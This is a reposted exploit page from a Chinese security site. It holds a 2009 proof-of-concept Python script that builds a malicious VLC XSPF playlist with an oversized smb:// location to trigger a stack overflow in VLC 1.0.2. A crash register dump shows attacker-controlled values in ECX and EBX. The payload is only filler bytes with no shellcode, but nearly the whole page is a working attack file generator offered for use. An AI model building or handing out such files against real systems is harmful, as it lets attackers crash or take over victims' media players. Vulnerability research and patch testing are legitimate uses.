首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC Media Player version 1.0.2 smb:// URI handling remote stack overflow proof o
来源:vfocus.net 作者:Dr_IDE 发布时间:2009-09-27   
##########################################################################################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By:	Dr_IDE
# Tested:	Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download:	http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947
#
##########################################################################################################

# XPSP3 Crash 
"""
EAX FFFFFFFE
ECX 42424242        <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFAC000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
               3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""
header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com@www.example.com/foo/#{")

payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2 =  ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");

try:
    f1 = open("vlc_1.0.2.xspf","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("\nExploit file created!\n")
except:
    print "Error"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CuteFTP version 8.3.3 Home/Pro
·Core FTP LE version 2.1 build
·html2ps versions 1.0 beta5 and
·CDBurnerXP version 4.2.4.1351
·Sun Solaris 10 RPC dmispd Remo
·BigAnt server versions 2.50 SP
·BigAnt server versions 2.50 SP
·Adobe Photoshop Elements 8.0 A
·Oracle Document Capture BlackI
·HP LoadRunner version 9.5 Pers
·Oracle Document Capture BlackI
·Multiple EMC products remote b
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved